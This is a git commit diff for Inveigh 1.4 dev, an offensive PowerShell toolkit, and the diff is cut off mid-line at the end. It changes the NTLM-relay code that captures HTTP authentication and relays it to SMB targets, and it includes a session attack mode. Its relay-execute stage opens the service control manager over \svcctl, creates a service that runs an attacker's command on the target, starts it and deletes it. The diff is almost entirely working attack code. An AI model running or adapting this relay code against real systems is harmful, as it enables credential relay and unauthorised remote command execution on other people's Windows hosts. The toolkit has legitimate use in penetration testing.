diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2018-02-20 22:46:15 -0500 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2018-02-20 22:46:15 -0500 |
| commit | 35d73e918733631b6bae2fe3c80865b9280399d9 (patch) | |
| tree | 53ac386120ca4acaafe0a0eb79bc89ece570022c | |
| parent | 43edf71b54567698d24d7c44ce3410120841b53a (diff) | |
| download | Inveigh-35d73e918733631b6bae2fe3c80865b9280399d9.tar.gz Inveigh-35d73e918733631b6bae2fe3c80865b9280399d9.zip | |
Inveigh 1.4 dev bug fixes
Fixed a lot of bugs with the new Inveigh Relay session attack mode.
Tweaked the SMB2 credits in Inveigh-Relay, Invoke-SMBExec, and
Invoke-SMBClient to hopefully keep the sessions from erroring out after
lots of repeated use. Switched to an SMB2 Echo to keep the sessions
active. Fixed some output issues.
Multitarget still isn't working correctly.
| -rw-r--r-- | Inveigh-Relay.ps1 | 401 | ||||
| -rw-r--r-- | Inveigh.ps1 | 353 | ||||
| -rw-r--r-- | Invoke-SMBClient.ps1 | 90 | ||||
| -rw-r--r-- | Invoke-SMBExec.ps1 | 116 |
4 files changed, 495 insertions, 465 deletions
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1 index 49c5629..dfd9500 100644 --- a/Inveigh-Relay.ps1 +++ b/Inveigh-Relay.ps1 @@ -238,6 +238,11 @@ if($Attack -eq 'Execute' -and !$Command) Write-Output "[-] -Command requiried with -Attack Execute" throw } +elseif($Attack -eq 'Session' -and $SMB1) +{ + Write-Output "[-] -SMB1 not suppported with -Attack Session" + throw +} if(!$FileOutputDirectory) { @@ -396,6 +401,11 @@ else $inveigh.newline = "" } +if($inveigh.running) +{ + $inveigh.output_pause = $true +} + # Write startup messages $inveigh.output_queue.Add("[*] Inveigh Relay $inveigh_version started at $(Get-Date -format s)") > $null @@ -410,7 +420,7 @@ if($HTTP -eq 'Y') if($HTTP_port_check) { $HTTP = "N" - $inveigh.output_queue.Add("[+] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null + $inveigh.output_queue.Add("[-] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null } else { @@ -727,7 +737,7 @@ elseif($RunTime -gt 1) if($ShowHelp -eq 'Y') { - $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop Inveigh-Relay") > $null + $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop manually") > $null if($inveigh.console_output) { @@ -796,10 +806,10 @@ while($inveigh.output_queue.Count -gt 0) } -$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id -$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) -$process_ID = $process_ID -replace "-00-00","" -[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} +if($inveigh.running) +{ + $inveigh.output_pause = $false +} # Begin ScriptBlocks @@ -812,6 +822,7 @@ $shared_basic_functions_scriptblock = param ([Int]$length_start,[Byte[]]$string_extract_data) $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0) + return $string_length } @@ -820,6 +831,7 @@ $shared_basic_functions_scriptblock = param ([Int]$length_start,[Byte[]]$string_extract_data) $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0) + return $string_length } @@ -831,6 +843,7 @@ $shared_basic_functions_scriptblock = $string_data = $string_data -replace "-00","" $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $string_extract = New-Object System.String ($string_data,0,$string_data.Length) + return $string_extract } @@ -851,6 +864,16 @@ $packet_functions_scriptblock = return $byte_array } + function Get-ProcessIDArray + { + $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id + $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) + [Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + + return $process_ID_bytes + } + + #NetBIOS function New-PacketNetBIOSSessionService @@ -873,6 +896,8 @@ $packet_functions_scriptblock = { param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID) + $packet_process_ID = $packet_process_ID[0,1] + $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42)) $packet_SMBHeader.Add("Command",$packet_command) @@ -1087,7 +1112,7 @@ $packet_functions_scriptblock = function New-PacketSMB2Header { - param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) + param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00 @@ -1102,7 +1127,7 @@ $packet_functions_scriptblock = $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("MessageID",$packet_message_ID) - $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("ProcessID",$packet_process_ID) $packet_SMB2Header.Add("TreeID",$packet_tree_ID) $packet_SMB2Header.Add("SessionID",$packet_session_ID) $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) @@ -1110,6 +1135,15 @@ $packet_functions_scriptblock = return $packet_SMB2Header } + function New-PacketSMB2Echo + { + $packet_SMB2EchoRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2EchoRequest.Add("StructureSize",[Byte[]](0x04,0x00)) + $packet_SMB2EchoRequest.Add("Reserved",[Byte[]](0x00,0x00)) + + return $packet_SMB2EchoRequest + } + function New-PacketSMB2NegotiateProtocolRequest { $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary @@ -1596,7 +1630,7 @@ $SMB_relay_functions_scriptblock = function SMBRelayChallenge { - param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$signing_check) + param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_process_ID) if($SMB_relay_socket) { @@ -1614,7 +1648,7 @@ $SMB_relay_functions_scriptblock = 'NegotiateSMB' { - $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00 + $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $SMB_process_ID 0x00,0x00 $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -1627,8 +1661,20 @@ $SMB_relay_functions_scriptblock = if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42') { - $SMB_version = 'SMB1' - $SMB_client_stage = 'NTLMSSPNegotiate' + + if($Attack -eq 'Session') + { + $inveigh.target_list.Remove($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString) + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed target $($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString) due to SMB1 requirement") + $SMB_relay_socket.Close() + $SMB_client_stage = 'exit' + } + else + { + $SMB_version = 'SMB1' + $SMB_client_stage = 'NTLMSSPNegotiate' + } + } else { @@ -1656,7 +1702,7 @@ $SMB_relay_functions_scriptblock = $SMB2_tree_ID = 0x00,0x00,0x00,0x00 $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 $SMB2_message_ID = 1 - $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -1674,7 +1720,7 @@ $SMB_relay_functions_scriptblock = if($SMB_version -eq 'SMB1') { - $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00 + $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $SMB_process_ID 0x00,0x00 $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)] $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate @@ -1686,8 +1732,8 @@ $SMB_relay_functions_scriptblock = } else { - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)] $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate @@ -1713,7 +1759,7 @@ $SMB_relay_functions_scriptblock = function SMBRelayResponse { - param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID) + param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID,$SMB_process_ID) $SMB_client_receive = New-Object System.Byte[] 1024 @@ -1724,7 +1770,7 @@ $SMB_relay_functions_scriptblock = if($SMB_version -eq 'SMB1') { - $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $SMB_process_ID $SMB_user_ID $packet_SMB_header["UserID"] = $SMB_user_ID $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header @@ -1739,7 +1785,7 @@ $SMB_relay_functions_scriptblock = { $SMB2_message_ID = 3 $SMB2_tree_ID = 0x00,0x00,0x00,0x00 - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth @@ -1764,10 +1810,10 @@ $SMB_relay_functions_scriptblock = if($HTTP_NTLM_domain_string -ne '') { - $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") + $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null } - $inveigh.relay_list.Add("$HTTP_source_IP $Target") + $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null $SMB_relay_failed = $true $SMB_relay_socket.Close() $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay authentication failed for $HTTP_username_full on $Target") > $null @@ -1778,7 +1824,7 @@ $SMB_relay_functions_scriptblock = function SMBRelayExecute { - param ($SMB_relay_socket,$SMB_version,$SMB_user_ID,$SMB_session_ID) + param ($SMB_relay_socket,$SMB_version,$SMB_user_ID,$SMB_session_ID,$SMB_process_ID) $SMB_client_receive = New-Object System.Byte[] 1024 @@ -1852,7 +1898,7 @@ $SMB_relay_functions_scriptblock = 'TreeConnectAndXRequest' { - $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBTreeConnectAndXRequest $SMB_path_bytes $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -1869,7 +1915,7 @@ $SMB_relay_functions_scriptblock = { $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl $SMB_tree_ID = $SMB_client_receive[28,29] - $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -1885,7 +1931,7 @@ $SMB_relay_functions_scriptblock = 'RPCBind' { $SMB_FID = $SMB_client_receive[42,43] - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data @@ -1905,7 +1951,7 @@ $SMB_relay_functions_scriptblock = 'ReadAndXRequest' { Start-Sleep -m 150 - $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBReadAndXRequest $packet_SMB_data["FID"] = $SMB_FID @@ -1921,7 +1967,7 @@ $SMB_relay_functions_scriptblock = 'OpenSCManagerW' { - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00 @@ -1967,12 +2013,12 @@ $SMB_relay_functions_scriptblock = if($HTTP_NTLM_domain_string -ne '') { - $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") + $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null } if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target")) { - $inveigh.relay_list.Add("$HTTP_source_IP $Target") + $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null } $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full does not have execution privilege on $Target") > $null @@ -1986,7 +2032,7 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW' { - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 @@ -2008,7 +2054,7 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW_First' { $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index) - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)] $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length) @@ -2040,7 +2086,7 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW_Middle' { $SMB_split_stage++ - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)] $SMB_split_index_tracker += $SMB_split_index $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle @@ -2070,7 +2116,7 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW_Last' { - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length] $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data @@ -2096,7 +2142,7 @@ $SMB_relay_functions_scriptblock = $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service created on $Target") > $null $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute SMB relay command on $Target") > $null $SMB_service_context_handle = $SMB_client_receive[92..111] - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00 @@ -2138,7 +2184,7 @@ $SMB_relay_functions_scriptblock = $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service failed to start on $Target") > $null } - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00 @@ -2173,7 +2219,7 @@ $SMB_relay_functions_scriptblock = $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle } - $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data @@ -2191,7 +2237,7 @@ $SMB_relay_functions_scriptblock = 'CloseRequest' { - $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBCloseRequest 0x00,0x40 $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -2206,7 +2252,7 @@ $SMB_relay_functions_scriptblock = 'TreeDisconnect' { - $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBTreeDisconnectRequest $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -2221,7 +2267,7 @@ $SMB_relay_functions_scriptblock = 'Logoff' { - $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $inveigh.process_ID_bytes $SMB_user_ID + $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $SMB_process_ID $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = New-PacketSMBLogoffAndXRequest $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -2260,7 +2306,7 @@ $SMB_relay_functions_scriptblock = { $SMB2_message_ID = 4 $SMB2_tree_ID = 0x00,0x00,0x00,0x00 - $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -2277,8 +2323,8 @@ $SMB_relay_functions_scriptblock = { $SMB2_tree_ID = 0x01,0x00,0x00,0x00 $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes $packet_SMB2_data["Share_Access"] = 0x07,0x00,0x00,0x00 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header @@ -2296,8 +2342,8 @@ $SMB_relay_functions_scriptblock = { $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl $SMB_file_ID = $SMB_client_receive[132..147] - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length @@ -2316,12 +2362,11 @@ $SMB_relay_functions_scriptblock = 'ReadRequest' { - Start-Sleep -m 150 - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditCharge"] = 0x10,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID + $packet_SMB2_data["Length"] = 0xff,0x00,0x00,0x00 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length @@ -2355,8 +2400,8 @@ $SMB_relay_functions_scriptblock = 'OpenSCManagerW' { - $SMB2_message_ID = 30 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00 @@ -2383,13 +2428,12 @@ $SMB_relay_functions_scriptblock = $SMB_service_manager_context_handle = $SMB_client_receive[108..127] $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data - $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has required privilege on $Target") > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has command execution privilege on $Target") > $null if($Attack -eq 'Session') { $SMB_administrator = $true $SMB_close_service_handle_stage = 2 - $SMB2_message_ID += 19 $SMB_client_stage = 'CloseServiceHandle' } elseif($SCM_data.Length -lt $SMB_split_index) @@ -2407,24 +2451,24 @@ $SMB_relay_functions_scriptblock = if($HTTP_NTLM_domain_string -ne '') { - $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") + $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null } if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target")) { - $inveigh.relay_list.Add("$HTTP_source_IP $Target") + $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null } if($Attack -ne 'Session') { $SMB_relay_failed = $true - $inveigh.relay_list.Add("0 $HTTP_source_IP $HTTP_username_full $Target") + $inveigh.relay_list.Add("0 $HTTP_source_IP $HTTP_username_full $Target") > $null } - $inveigh.output_queue.Add("[!] $(Get-Date -format s) $HTTP_username_full does not have required privilege on $Target") > $null + $inveigh.output_queue.Add("[!] $(Get-Date -format s) $HTTP_username_full does not have command execution privilege on $Target") > $null $SMB_service_manager_context_handle = $SMB_client_receive[108..127] $SMB_close_service_handle_stage = 2 - $SMB2_message_ID += 19 + $SMB2_message_ID++ $SMB_client_stage = 'CloseServiceHandle' } else @@ -2436,8 +2480,8 @@ $SMB_relay_functions_scriptblock = 'CreateServiceW' { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID 